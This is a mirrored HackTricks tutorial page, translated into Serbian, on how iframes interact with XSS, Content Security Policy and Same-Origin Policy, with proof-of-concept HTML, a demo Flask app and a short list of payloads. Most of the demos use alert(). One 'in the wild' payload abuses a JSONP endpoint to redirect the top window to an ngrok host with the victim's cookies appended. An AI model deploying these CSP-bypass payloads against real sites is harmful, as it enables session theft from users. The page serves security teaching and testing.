mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 16:10:54 +00:00
171 lines
8.7 KiB
Markdown
171 lines
8.7 KiB
Markdown
# Iframes in XSS, CSP and SOP
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Iframes in XSS
|
|
|
|
Postoje 3 načina da se označi sadržaj iframed stranice:
|
|
|
|
* Putem `src` koji označava URL (URL može biti cross origin ili same origin)
|
|
* Putem `src` koji označava sadržaj koristeći `data:` protokol
|
|
* Putem `srcdoc` koji označava sadržaj
|
|
|
|
**Pristupanje Parent & Child varijablama**
|
|
```html
|
|
<html>
|
|
<script>
|
|
var secret = "31337s3cr37t";
|
|
</script>
|
|
|
|
<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
|
|
<iframe id="if2" src="child.html"></iframe>
|
|
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
|
|
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
|
|
|
|
<script>
|
|
function access_children_vars(){
|
|
alert(if1.secret);
|
|
alert(if2.secret);
|
|
alert(if3.secret);
|
|
alert(if4.secret);
|
|
}
|
|
setTimeout(access_children_vars, 3000);
|
|
</script>
|
|
</html>
|
|
```
|
|
|
|
```html
|
|
<!-- content of child.html -->
|
|
<script>
|
|
var secret="child secret";
|
|
alert(parent.secret)
|
|
</script>
|
|
```
|
|
Ako pristupite prethodnom html-u putem http servera (kao što je `python3 -m http.server`), primetićete da će se svi skripti izvršiti (pošto ne postoji CSP koji to sprečava). **roditelj neće moći da pristupi `secret` varijabli unutar bilo kog iframe-a** i **samo iframe-ovi if2 i if3 (koji se smatraju istim mestom) mogu pristupiti tajni** u originalnom prozoru.\
|
|
Obratite pažnju kako se if4 smatra da ima `null` poreklo.
|
|
|
|
### Iframes sa CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
|
|
|
|
{% hint style="info" %}
|
|
Molimo vas, obratite pažnju kako u sledećim zaobilaženjima odgovor na iframed stranicu ne sadrži nijedan CSP header koji sprečava izvršavanje JS-a.
|
|
{% endhint %}
|
|
|
|
`self` vrednost `script-src` neće dozvoliti izvršavanje JS koda koristeći `data:` protokol ili `srcdoc` atribut.\
|
|
Međutim, čak i `none` vrednost CSP-a će dozvoliti izvršavanje iframe-ova koji stavljaju URL (potpun ili samo putanju) u `src` atribut.\
|
|
Stoga je moguće zaobići CSP stranice sa:
|
|
```html
|
|
<html>
|
|
<head>
|
|
<meta http-equiv="Content-Security-Policy" content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='">
|
|
</head>
|
|
<script>
|
|
var secret = "31337s3cr37t";
|
|
</script>
|
|
<iframe id="if1" src="child.html"></iframe>
|
|
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
|
|
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
|
|
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
|
|
</html>
|
|
```
|
|
Napomena kako **prethodni CSP dozvoljava samo izvršavanje inline skripte**.\
|
|
Međutim, **samo `if1` i `if2` skripte će biti izvršene, ali samo `if1` će moći da pristupi roditeljskom tajnom**.
|
|
|
|
![](<../../.gitbook/assets/image (372).png>)
|
|
|
|
Stoga, moguće je **obići CSP ako možete da otpremite JS datoteku na server i učitate je putem iframe-a čak i sa `script-src 'none'`**. Ovo se **potencijalno može uraditi i zloupotrebom same-site JSONP krajnje tačke**.
|
|
|
|
Možete testirati ovo sa sledećim scenarijom gde je kolačić ukraden čak i sa `script-src 'none'`. Samo pokrenite aplikaciju i pristupite joj putem vašeg pregledača:
|
|
```python
|
|
import flask
|
|
from flask import Flask
|
|
app = Flask(__name__)
|
|
|
|
@app.route("/")
|
|
def index():
|
|
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
|
|
resp.headers['Content-Security-Policy'] = "script-src 'self'"
|
|
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
|
|
return resp
|
|
|
|
@app.route("/cookie_s.html")
|
|
def cookie_s():
|
|
return "<script>alert(document.cookie)</script>"
|
|
|
|
if __name__ == "__main__":
|
|
app.run()
|
|
```
|
|
### Ostali payloadi pronađeni u divljini <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
|
|
```html
|
|
<!-- This one requires the data: scheme to be allowed -->
|
|
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
|
|
<!-- This one injects JS in a jsonp endppoint -->
|
|
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
|
|
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
|
|
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
|
|
```
|
|
### Iframe sandbox
|
|
|
|
Sadržaj unutar iframe-a može biti podvrgnut dodatnim ograničenjima korišćenjem `sandbox` atributa. Po defaultu, ovaj atribut nije primenjen, što znači da nema ograničenja.
|
|
|
|
Kada se koristi, `sandbox` atribut nameće nekoliko ograničenja:
|
|
|
|
* Sadržaj se tretira kao da potiče iz jedinstvenog izvora.
|
|
* Svaki pokušaj slanja formi je blokiran.
|
|
* Izvršavanje skripti je zabranjeno.
|
|
* Pristup određenim API-jima je onemogućen.
|
|
* Sprečava interakciju linkova sa drugim kontekstima pretraživanja.
|
|
* Korišćenje dodataka putem `<embed>`, `<object>`, `<applet>`, ili sličnih oznaka je zabranjeno.
|
|
* Navigacija sadržajem najvišeg nivoa pretraživačkog konteksta od strane samog sadržaja je sprečena.
|
|
* Funkcije koje se automatski aktiviraju, poput reprodukcije videa ili automatskog fokusiranja kontrola formi, su blokirane.
|
|
|
|
Vrednost atributa može biti ostavljena prazna (`sandbox=""`) da bi se primenila sva prethodno navedena ograničenja. Alternativno, može se postaviti na listu specifičnih vrednosti odvojenih razmakom koje izuzimaju iframe od određenih ograničenja.
|
|
```html
|
|
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
|
|
```
|
|
## Iframes u SOP
|
|
|
|
Proverite sledeće stranice:
|
|
|
|
{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md" %}
|
|
[bypassing-sop-with-iframes-1.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md" %}
|
|
[bypassing-sop-with-iframes-2.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% content-ref url="../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md" %}
|
|
[blocking-main-page-to-steal-postmessage.md](../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% content-ref url="../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md" %}
|
|
[steal-postmessage-modifying-iframe-location.md](../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% hint style="success" %}
|
|
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Podrška HackTricks</summary>
|
|
|
|
* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
|
|
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
|
|
|
</details>
|
|
{% endhint %}
|